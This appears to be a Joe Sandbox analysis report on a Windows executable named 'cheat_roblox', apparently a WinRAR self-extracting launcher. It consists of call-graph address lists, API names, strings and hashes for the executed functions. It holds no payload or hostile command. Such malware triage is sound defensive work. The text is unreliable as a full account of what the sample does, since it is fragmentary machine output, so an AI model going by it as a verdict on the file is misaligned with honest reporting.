BuildCatchObjectHelperInternal 25911->25930 25912->25893 25977 7ff6e7e12004 33 API calls std::_Xinvalid_argument 25914->25977 25921 7ff6e7e270b7 25915->25921 25922 7ff6e7e270db 25916->25922 25917 7ff6e7e270a6 25928 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 25917->25928 25918 7ff6e7e26f56 25974 7ff6e7e111cc 33 API calls BuildCatchObjectHelperInternal 25918->25974 25932 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 25921->25932 25934 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 25922->25934 25929 7ff6e7e1129c 33 API calls 25923->25929 25923->25962 25924->25930 25926 7ff6e7e270c3 25937 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 25926->25937 25927 7ff6e7e11fa0 31 API calls 25927->25962 25928->25901 25935 7ff6e7e26bbe 25929->25935 25930->25927 25931 7ff6e7e26f69 25975 7ff6e7e257ac 33 API calls BuildCatchObjectHelperInternal 25931->25975 25932->25914 25933 7ff6e7e11fa0 31 API calls 25947 7ff6e7e26df5 25933->25947 25938 7ff6e7e270e1 25934->25938 25965 7ff6e7e25820 33 API calls 25935->25965 25940 7ff6e7e270c9 25937->25940 25978 7ff6e7e1704c 47 API calls BuildCatchObjectHelperInternal 25940->25978 25941 7ff6e7e26d76 BuildCatchObjectHelperInternal 25941->25926 25941->25933 25942 7ff6e7e26bd3 25966 7ff6e7e1e164 33 API calls 2 library calls 25942->25966 25943 7ff6e7e11fa0 31 API calls 25946 7ff6e7e26fec 25943->25946 25948 7ff6e7e11fa0 31 API calls 25946->25948 25953 7ff6e7e26e21 25947->25953 25968 7ff6e7e11744 33 API calls 4 library calls 25947->25968 25952 7ff6e7e26ff6 25948->25952 25949 7ff6e7e26f79 BuildCatchObjectHelperInternal 25949->25922 25949->25943 25951 7ff6e7e11fa0 31 API calls 25955 7ff6e7e26c6d 25951->25955 25956 7ff6e7e11fa0 31 API calls 25952->25956 25953->25940 25957 7ff6e7e1129c 33 API calls 25953->25957 25954 7ff6e7e26be9 BuildCatchObjectHelperInternal 25954->25921 25954->25951 25958 7ff6e7e11fa0 31 API calls 25955->25958 25956->25962 25959 7ff6e7e26ec2 25957->25959 25958->25962 25969 7ff6e7e12034 25959->25969 25961 7ff6e7e26edf 25963 7ff6e7e11fa0 31 API calls 25961->25963 25962->25905 25962->25909 25962->25912 25962->25917 25963->25962 25964->25911 25965->25942 25966->25954 25967->25941 25968->25953 25970 7ff6e7e12085 25969->25970 25972 7ff6e7e12059 BuildCatchObjectHelperInternal 25969->25972 25980 7ff6e7e115b8 33 API calls 3 library calls 25970->25980 25972->25961 25973->25918 25974->25931 25975->25949 25978->25907 25980->25972 25981->25858 25990 7ff6e7e29638 25983->25990 25986 7ff6e7e297d9 25988 7ff6e7e42320 _handle_error 8 API calls 25986->25988 25989 7ff6e7e297f2 25988->25989 25989->25871 25989->25872 25991 7ff6e7e29692 25990->25991 25999 7ff6e7e29730 25990->25999 25996 7ff6e7e296c0 25991->25996 26004 7ff6e7e30f68 WideCharToMultiByte 25991->26004 25993 7ff6e7e296ef 26007 7ff6e7e4a270 31 API calls 2 library calls 25993->26007 25994 7ff6e7e42320 _handle_error 8 API calls 25995 7ff6e7e29764 25994->25995 25995->25986 26000 7ff6e7e29800 25995->26000 25996->25993 26006 7ff6e7e2aa88 45 API calls 2 library calls 25996->26006 25999->25994 26001 7ff6e7e29840 26000->26001 26003 7ff6e7e29869 26000->26003 26008 7ff6e7e4a270 31 API calls 2 library calls 26001->26008 26003->25986 26005 7ff6e7e30faa 26004->26005 26005->25996 26006->25993 26007->25999 26008->26003 26025 7ff6e7e2d4d0 26009->26025 26014 7ff6e7e2d8e5 swprintf 26020 7ff6e7e2d974 26014->26020 26039 7ff6e7e49ef0 26014->26039 26066 7ff6e7e19d78 33 API calls 26014->26066 26016 7ff6e7e2da17 26017 7ff6e7e42320 _handle_error 8 API calls 26016->26017 26019 7ff6e7e2da2b 26017->26019 26018 7ff6e7e2da3f 26021 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26018->26021 26019->25686 26022 7ff6e7e2d9a3 26020->26022 26067 7ff6e7e19d78 33 API calls 26020->26067 26023 7ff6e7e2da44 26021->26023 26022->26016 26022->26018 26026 7ff6e7e2d665 26025->26026 26028 7ff6e7e2d502 26025->26028 26029 7ff6e7e2cb80 26026->26029 26027 7ff6e7e11744 33 API calls 26027->26028 26028->26026 26028->26027 26030 7ff6e7e2cbb6 26029->26030 26031 7ff6e7e2cc80 26029->26031 26034 7ff6e7e2cc7b 26030->26034 26035 7ff6e7e2cc20 26030->26035 26037 7ff6e7e2cbc6 26030->26037 26069 7ff6e7e12004 33 API calls std::_Xinvalid_argument 26031->26069 26068 7ff6e7e11f80 33 API calls 3 library calls 26034->26068 26035->26037 26038 7ff6e7e421d0 33 API calls 26035->26038 26037->26014 26038->26037 26040 7ff6e7e49f36 26039->26040 26041 7ff6e7e49f4e 26039->26041 26070 7ff6e7e4d69c 15 API calls _set_errno_from_matherr 26040->26070 26041->26040 26042 7ff6e7e49f58 26041->26042 26072 7ff6e7e47ef0 35 API calls 2 library calls 26042->26072 26045 7ff6e7e49f3b 26071 7ff6e7e478e4 31 API calls _invalid_parameter_noinfo_noreturn 26045->26071 26047 7ff6e7e42320 _handle_error 8 API calls 26049 7ff6e7e4a10b 26047->26049 26048 7ff6e7e49f69 __scrt_get_show_window_mode 26073 7ff6e7e47e70 15 API calls _set_errno_from_matherr 26048->26073 26049->26014 26051 7ff6e7e49fd4 26074 7ff6e7e482f8 46 API calls 3 library calls 26051->26074 26053 7ff6e7e49fdd 26054 7ff6e7e4a014 26053->26054 26055 7ff6e7e49fe5 26053->26055 26057 7ff6e7e4a092 26054->26057 26060 7ff6e7e4a01a 26054->26060 26062 7ff6e7e4a06c 26054->26062 26064 7ff6e7e4a023 26054->26064 26075 7ff6e7e4d90c 26055->26075 26058 7ff6e7e4a09c 26057->26058 26057->26062 26063 7ff6e7e4d90c __free_lconv_num 15 API calls 26058->26063 26059 7ff6e7e4d90c __free_lconv_num 15 API calls 26065 7ff6e7e49f46 26059->26065 26060->26062 26060->26064 26061 7ff6e7e4d90c __free_lconv_num 15 API calls 26061->26065 26062->26061 26063->26065 26064->26059 26065->26047 26066->26014 26067->26022 26068->26031 26070->26045 26071->26065 26072->26048 26073->26051 26074->26053 26076 7ff6e7e4d941 __free_lconv_num 26075->26076 26077 7ff6e7e4d911 RtlRestoreThreadPreferredUILanguages 26075->26077 26076->26065 26077->26076 26078 7ff6e7e4d92c 26077->26078 26081 7ff6e7e4d69c 15 API calls _set_errno_from_matherr 26078->26081 26080 7ff6e7e4d931 GetLastError 26080->26076 26081->26080 26083 7ff6e7e120f6 26082->26083 26085 7ff6e7e120cb BuildCatchObjectHelperInternal 26082->26085 26086 7ff6e7e11474 33 API calls 3 library calls 26083->26086 26085->25698 26086->26085 26087->25723 26089->25736 26090->25737 26091->25740 26093 7ff6e7e3864f SizeofResource 26092->26093 26094 7ff6e7e3879b 26092->26094 26093->26094 26095 7ff6e7e38669 LoadResource 26093->26095 26094->25779 26095->26094 26096 7ff6e7e38682 LockResource 26095->26096 26096->26094 26097 7ff6e7e38697 GlobalAlloc 26096->26097 26097->26094 26098 7ff6e7e386b8 GlobalLock 26097->26098 26099 7ff6e7e38792 GlobalFree 26098->26099 26100 7ff6e7e386ca BuildCatchObjectHelperInternal 26098->26100 26099->26094 26101 7ff6e7e38789 GlobalUnlock 26100->26101 26102 7ff6e7e386f6 GdipAlloc 26100->26102 26101->26099 26103 7ff6e7e3870b 26102->26103 26103->26101 26104 7ff6e7e3875a GdipCreateHBITMAPFromBitmap 26103->26104 26105 7ff6e7e38772 26103->26105 26104->26105 26105->26101 26107 7ff6e7e384cc 4 API calls 26106->26107 26108 7ff6e7e384aa 26107->26108 26110 7ff6e7e384b9 26108->26110 26117 7ff6e7e38504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26108->26117 26110->25786 26110->25787 26110->25789 26111->25790 26113 7ff6e7e384e3 26112->26113 26114 7ff6e7e384de 26112->26114 26116 7ff6e7e38df4 16 API calls _handle_error 26113->26116 26118 7ff6e7e38590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26114->26118 26116->25796 26117->26110 26118->26113 26122 7ff6e7e298fe _snwprintf 26119->26122 26120 7ff6e7e29973 26237 7ff6e7e268b0 48 API calls 26120->26237 26122->26120 26124 7ff6e7e29a89 26122->26124 26123 7ff6e7e11fa0 31 API calls 26126 7ff6e7e299fd 26123->26126 26124->26126 26128 7ff6e7e120b0 33 API calls 26124->26128 26125 7ff6e7e2997d BuildCatchObjectHelperInternal 26125->26123 26127 7ff6e7e2a42e 26125->26127 26188 7ff6e7e224c0 26126->26188 26129 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26127->26129 26128->26126 26131 7ff6e7e2a434 26129->26131 26134 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26131->26134 26133 7ff6e7e29a22 26136 7ff6e7e2204c 100 API calls 26133->26136 26137 7ff6e7e2a43a 26134->26137 26135 7ff6e7e29b17 26206 7ff6e7e4a450 26135->26206 26138 7ff6e7e29a2b 26136->26138 26138->26131 26142 7ff6e7e29a66 26138->26142 26141 7ff6e7e29aad 26141->26135 26146 7ff6e7e28e58 33 API calls 26141->26146 26144 7ff6e7e42320 _handle_error 8 API calls 26142->26144 26143 7ff6e7e4a450 31 API calls 26157 7ff6e7e29b57 __vcrt_InitializeCriticalSectionEx 26143->26157 26145 7ff6e7e2a40e 26144->26145 26145->25799 26146->26141 26147 7ff6e7e29c89 26148 7ff6e7e22aa0 101 API calls 26147->26148 26160 7ff6e7e29d5c 26147->26160 26151 7ff6e7e29ca1 26148->26151 26152 7ff6e7e228d0 104 API calls 26151->26152 26151->26160 26158 7ff6e7e29cc9 26152->26158 26157->26147 26157->26160 26214 7ff6e7e22bb0 26157->26214 26223 7ff6e7e228d0 26157->26223 26228 7ff6e7e22aa0 26157->26228 26158->26160 26180 7ff6e7e29cd7 __vcrt_InitializeCriticalSectionEx 26158->26180 26238 7ff6e7e30bbc MultiByteToWideChar 26158->26238 26233 7ff6e7e2204c 26160->26233 26161 7ff6e7e2a1ec 26170 7ff6e7e2a2c2 26161->26170 26244 7ff6e7e4cf90 31 API calls 2 library calls 26161->26244 26163 7ff6e7e2a157 26163->26161 26241 7ff6e7e4cf90 31 API calls 2 library calls 26163->26241 26164 7ff6e7e2a14b 26164->25799 26167 7ff6e7e2a2ae 26167->26170 26246 7ff6e7e28cd0 33 API calls 2 library calls 26167->26246 26168 7ff6e7e2a3a2 26171 7ff6e7e4a450 31 API calls 26168->26171 26169 7ff6e7e2a249 26245 7ff6e7e4b7bc 31 API calls _invalid_parameter_noinfo_noreturn 26169->26245 26170->26168 26172 7ff6e7e28e58 33 API calls 26170->26172 26174 7ff6e7e2a3cb 26171->26174 26172->26170 26176 7ff6e7e4a450 31 API calls 26174->26176 26175 7ff6e7e2a16d 26242 7ff6e7e4b7bc 31 API calls _invalid_parameter_noinfo_noreturn 26175->26242 26176->26160 26178 7ff6e7e2a1d8 26178->26161 26243 7ff6e7e28cd0 33 API calls 2 library calls 26178->26243 26180->26160 26180->26161 26180->26163 26180->26164 26181 7ff6e7e2a429 26180->26181 26183 7ff6e7e30f68 WideCharToMultiByte 26180->26183 26239 7ff6e7e2aa88 45 API calls 2 library calls 26180->26239 26240 7ff6e7e4a270 31 API calls 2 library calls 26180->26240 26247 7ff6e7e42624 8 API calls 26181->26247 26183->26180 26187 7ff6e7e2a468 26186->26187 26187->25801 26189 7ff6e7e224fd CreateFileW 26188->26189 26191 7ff6e7e225ae GetLastError 26189->26191 26199 7ff6e7e2266e 26189->26199 26192 7ff6e7e26a0c 49 API calls 26191->26192 26193 7ff6e7e225dc 26192->26193 26194 7ff6e7e225e0 CreateFileW GetLastError 26193->26194 26200 7ff6e7e2262c 26193->26200 26194->26200 26195 7ff6e7e226b1 SetFileTime 26198 7ff6e7e226cf 26195->26198 26196 7ff6e7e22708 26197 7ff6e7e42320 _handle_error 8 API calls 26196->26197 26201 7ff6e7e2271b 26197->26201 26198->26196 26202 7ff6e7e120b0 33 API calls 26198->26202 26199->26195 26199->26198 26200->26199 26203 7ff6e7e22736 26200->26203 26201->26133 26201->26141 26202->26196 26204 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 26203->26204 26205 7ff6e7e2273b 26204->26205 26207 7ff6e7e4a47d 26206->26207 26213 7ff6e7e4a492 26207->26213 26248 7ff6e7e4d69c 15 API calls _set_errno_from_matherr 26207->26248 26209 7ff6e7e4a487 26249 7ff6e7e478e4 31 API calls _invalid_parameter_noinfo_noreturn 26209->26249 26211 7ff6e7e42320 _handle_error 8 API calls 26212 7ff6e7e29b37 26211->26212 26212->26143 26213->26211 26215 7ff6e7e22bcd 26214->26215 26216 7ff6e7e22be9 26214->26216 26217 7ff6e7e22bfb 26215->26217 26250 7ff6e7e1b9c4 99 API calls _com_raise_error 26215->26250 26216->26217 26219 7ff6e7e22c01 SetFilePointer 26216->26219 26217->26157 26219->26217 26220 7ff6e7e22c1e GetLastError 26219->26220 26220->26217 26221 7ff6e7e22c28 26220->26221 26221->26217 26251 7ff6e7e1b9c4 99 API calls _com_raise_error 26221->26251 26224 7ff6e7e228f6 26223->26224 26225 7ff6e7e228fd 26223->26225 26224->26157 26225->26224 26227 7ff6e7e22320 GetStdHandle ReadFile GetLastError GetLastError GetFileType 26225->26227 26252 7ff6e7e1b8a4 99 API calls _com_raise_error 26225->26252 26227->26225 26253 7ff6e7e22778 26228->26253 26231 7ff6e7e22ac7 26231->26157 26234 7ff6e7e22066 26233->26234 26235 7ff6e7e22072 26233->26235 26234->26235 26261 7ff6e7e220d0 26234->26261 26237->26125 26238->26180 26239->26180 26240->26180 26241->26175 26242->26178 26243->26161 26244->26169 26245->26167 26246->26170 26247->26127 26248->26209 26249->26213 26254 7ff6e7e22789 _snwprintf 26253->26254 26255 7ff6e7e22890 SetFilePointer 26254->26255 26259 7ff6e7e227b5 26254->26259 26257 7ff6e7e228b8 GetLastError 26255->26257 26255->26259 26256 7ff6e7e42320 _handle_error 8 API calls 26258 7ff6e7e2281d 26256->26258 26257->26259 26258->26231 26260 7ff6e7e1b9c4 99 API calls _com_raise_error 26258->26260 26259->26256 26262 7ff6e7e22102 26261->26262 26263 7ff6e7e220ea 26261->26263 26264 7ff6e7e22126 26262->26264 26267 7ff6e7e1b544 99 API calls 26262->26267 26263->26262 26265 7ff6e7e220f6 FindCloseChangeNotification 26263->26265 26264->26235 26265->26262 26267->26264 26268->25811 26337 7ff6e7e40df5 14 API calls _com_raise_error 26375 7ff6e7e4d94c 26376 7ff6e7e4d997 26375->26376 26380 7ff6e7e4d95b _set_errno_from_matherr 26375->26380 26382 7ff6e7e4d69c 15 API calls _set_errno_from_matherr 26376->26382 26378 7ff6e7e4d97e RtlAllocateHeap 26379 7ff6e7e4d995 26378->26379 26378->26380 26380->26376 26380->26378 26381 7ff6e7e4bbc0 _set_errno_from_matherr 2 API calls 26380->26381 26381->26380 26382->26379

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FF6E7E3B190 Relevance: 123.9, APIs: 60, Strings: 10, Instructions: 1421windowfilesleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
                                                                                                                  • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                                                                  • API String ID: 3303814210-2702805183
                                                                                                                  • Opcode ID: 0e8d890bdde75d6605bcec53c920d417cd8344987430ee63e9d897233e2217a9
                                                                                                                  • Instruction ID: d991e0f0a39ec86cf976a5c6969d83b99ff5027bc9dbf25398c341d14eb0bcb3
                                                                                                                  • Opcode Fuzzy Hash: 0e8d890bdde75d6605bcec53c920d417cd8344987430ee63e9d897233e2217a9
                                                                                                                  • Instruction Fuzzy Hash: 14D2C063A0878391EA20DB25E8553F96361EF86780F404135DAED876F6EF3EE544C34A
                                                                                                                  Function 00007FF6E7E3CE88 Relevance: 65.0, APIs: 26, Strings: 10, Instructions: 1963fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$ButtonCheckedFileMove$DialogItemPathTemp
                                                                                                                  • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                                                  • API String ID: 1830998149-3916287355
                                                                                                                  • Opcode ID: 24401d00356af0f8a2b66be03998f7c7698b069a38d94f1f9b1c3a1823484afa
                                                                                                                  • Instruction ID: ed255d8ee097e70cb18af74df1ab62e6491f4476e7fe838748a5084d6a28abfb
                                                                                                                  • Opcode Fuzzy Hash: 24401d00356af0f8a2b66be03998f7c7698b069a38d94f1f9b1c3a1823484afa
                                                                                                                  • Instruction Fuzzy Hash: D213CE23B04B8299EB10DF64D8843EC27B1EB54398F400535DAAD97AE9DF3DE585C34A
                                                                                                                  Function 00007FF6E7E40754 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 380filesleeptimeCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1466 7ff6e7e40754-7ff6e7e40829 call 7ff6e7e2dfd0 call 7ff6e7e262dc call 7ff6e7e3946c call 7ff6e7e43cf0 call 7ff6e7e39a14 1477 7ff6e7e4082b-7ff6e7e40840 1466->1477 1478 7ff6e7e40860-7ff6e7e40883 1466->1478 1479 7ff6e7e4085b call 7ff6e7e4220c 1477->1479 1480 7ff6e7e40842-7ff6e7e40855 1477->1480 1481 7ff6e7e408ba-7ff6e7e408dd 1478->1481 1482 7ff6e7e40885-7ff6e7e4089a 1478->1482 1479->1478 1480->1479 1485 7ff6e7e40ddd-7ff6e7e40de2 call 7ff6e7e47904 1480->1485 1483 7ff6e7e408df-7ff6e7e408f4 1481->1483 1484 7ff6e7e40914-7ff6e7e40937 1481->1484 1487 7ff6e7e4089c-7ff6e7e408af 1482->1487 1488 7ff6e7e408b5 call 7ff6e7e4220c 1482->1488 1489 7ff6e7e408f6-7ff6e7e40909 1483->1489 1490 7ff6e7e4090f call 7ff6e7e4220c 1483->1490 1491 7ff6e7e40939-7ff6e7e4094e 1484->1491 1492 7ff6e7e4096e-7ff6e7e4097a GetCommandLineW 1484->1492 1503 7ff6e7e40de3-7ff6e7e40e2f call 7ff6e7e47904 call 7ff6e7e41900 1485->1503 1487->1485 1487->1488 1488->1481 1489->1485 1489->1490 1490->1484 1496 7ff6e7e40969 call 7ff6e7e4220c 1491->1496 1497 7ff6e7e40950-7ff6e7e40963 1491->1497 1499 7ff6e7e40b47-7ff6e7e40b5e call 7ff6e7e26454 1492->1499 1500 7ff6e7e40980-7ff6e7e409b7 call 7ff6e7e4797c call 7ff6e7e1129c call 7ff6e7e3cad0 1492->1500 1496->1492 1497->1485 1497->1496 1508 7ff6e7e40b89-7ff6e7e40ce4 call 7ff6e7e11fa0 SetEnvironmentVariableW GetLocalTime call 7ff6e7e23e28 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff6e7e3b014 call 7ff6e7e298ac call 7ff6e7e367b4 * 2 DialogBoxParamW call 7ff6e7e368a8 * 2 1499->1508 1509 7ff6e7e40b60-7ff6e7e40b85 call 7ff6e7e11fa0 call 7ff6e7e43640 1499->1509 1525 7ff6e7e409b9-7ff6e7e409cc 1500->1525 1526 7ff6e7e409ec-7ff6e7e409f3 1500->1526 1523 7ff6e7e40e34-7ff6e7e40e6a 1503->1523 1572 7ff6e7e40ce6 Sleep 1508->1572 1573 7ff6e7e40cec-7ff6e7e40cf3 1508->1573 1509->1508 1524 7ff6e7e40e6c 1523->1524 1524->1524 1529 7ff6e7e409e7 call 7ff6e7e4220c 1525->1529 1530 7ff6e7e409ce-7ff6e7e409e1 1525->1530 1531 7ff6e7e409f9-7ff6e7e40a13 OpenFileMappingW 1526->1531 1532 7ff6e7e40adb-7ff6e7e40b05 call 7ff6e7e4797c call 7ff6e7e1129c call 7ff6e7e3fd0c 1526->1532 1529->1526 1530->1503 1530->1529 1536 7ff6e7e40a19-7ff6e7e40a39 MapViewOfFile 1531->1536 1537 7ff6e7e40ad0-7ff6e7e40ad9 CloseHandle 1531->1537 1552 7ff6e7e40b0a-7ff6e7e40b12 1532->1552 1536->1537 1540 7ff6e7e40a3f-7ff6e7e40a6f UnmapViewOfFile MapViewOfFile 1536->1540 1537->1499 1540->1537 1544 7ff6e7e40a71-7ff6e7e40aca call 7ff6e7e3a190 call 7ff6e7e3fd0c call 7ff6e7e2b9b4 call 7ff6e7e2bb00 call 7ff6e7e2bb70 UnmapViewOfFile 1540->1544 1544->1537 1552->1499 1555 7ff6e7e40b14-7ff6e7e40b27 1552->1555 1558 7ff6e7e40b29-7ff6e7e40b3c 1555->1558 1559 7ff6e7e40b42 call 7ff6e7e4220c 1555->1559 1558->1559 1562 7ff6e7e40dd7-7ff6e7e40ddc call 7ff6e7e47904 1558->1562 1559->1499 1562->1485 1572->1573 1575 7ff6e7e40cfa-7ff6e7e40d1d call 7ff6e7e2b8e0 DeleteObject 1573->1575 1576 7ff6e7e40cf5 call 7ff6e7e39f4c 1573->1576 1580 7ff6e7e40d1f DeleteObject 1575->1580 1581 7ff6e7e40d25-7ff6e7e40d2c 1575->1581 1576->1575 1580->1581 1582 7ff6e7e40d48-7ff6e7e40d59 1581->1582 1583 7ff6e7e40d2e-7ff6e7e40d35 1581->1583 1585 7ff6e7e40d6d-7ff6e7e40d7a 1582->1585 1586 7ff6e7e40d5b-7ff6e7e40d67 call 7ff6e7e3fe24 CloseHandle 1582->1586 1583->1582 1584 7ff6e7e40d37-7ff6e7e40d43 call 7ff6e7e1ba0c 1583->1584 1584->1582 1589 7ff6e7e40d7c-7ff6e7e40d89 1585->1589 1590 7ff6e7e40d9f-7ff6e7e40da4 call 7ff6e7e394e4 1585->1590 1586->1585 1593 7ff6e7e40d99-7ff6e7e40d9b 1589->1593 1594 7ff6e7e40d8b-7ff6e7e40d93 1589->1594 1595 7ff6e7e40da9-7ff6e7e40dd6 call 7ff6e7e42320 1590->1595 1593->1590 1597 7ff6e7e40d9d 1593->1597 1594->1590 1596 7ff6e7e40d95-7ff6e7e40d97 1594->1596 1596->1590 1597->1590
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                  • API String ID: 1048086575-3710569615
                                                                                                                  • Opcode ID: 698fae3a653e1b7d4e45f88450a095eb1b46b52804e719b722bb591d7123fd6d
                                                                                                                  • Instruction ID: 135e7869471a50ba68675d3e0b263a1aaf0e998f4138604745d598e815b9da23
                                                                                                                  • Opcode Fuzzy Hash: 698fae3a653e1b7d4e45f88450a095eb1b46b52804e719b722bb591d7123fd6d
                                                                                                                  • Instruction Fuzzy Hash: BB12B823A18B8281EB10DB24F8453797361FF84794F404231DAED87AA6EF3EE545D74A
                                                                                                                  Function 00007FF6E7E2A4AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                                                                                                  • String ID: $%s:$CAPTION
                                                                                                                  • API String ID: 1936833115-404845831
                                                                                                                  • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                                                  • Instruction ID: 299b9d234ee4823aa01a5f2bac5cee68a71e2949f4095b412d07f58385e6738d
                                                                                                                  • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                                                  • Instruction Fuzzy Hash: 8F91F733B1868286E718CF29E80476AA7A1FB84784F505535EE9D97B98DF3DE805CB04
                                                                                                                  Function 00007FF6E7E38624 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 101memorywindowCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
